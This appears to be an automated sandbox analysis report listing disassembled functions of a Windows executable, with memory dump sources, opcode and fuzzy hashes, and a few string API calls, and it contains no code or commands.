                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                            • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                                            • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                            • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                                            Function 00406E3E Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                            • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                                            • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                            • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                                            Function 00406943 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                            • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                                                                            • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                            • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                                                                            Function 00406D91 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                            • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                                                                            • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                            • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                                                                            Function 00406EAF Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                            • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                                                                            • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                            • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                                                                            Function 00406DFB Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                            • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                                                                            • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                            • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                                                                            Function 00405E43 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                                            • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 190613189-0
                                                                                                            • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                            • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                                                                            • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                            • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98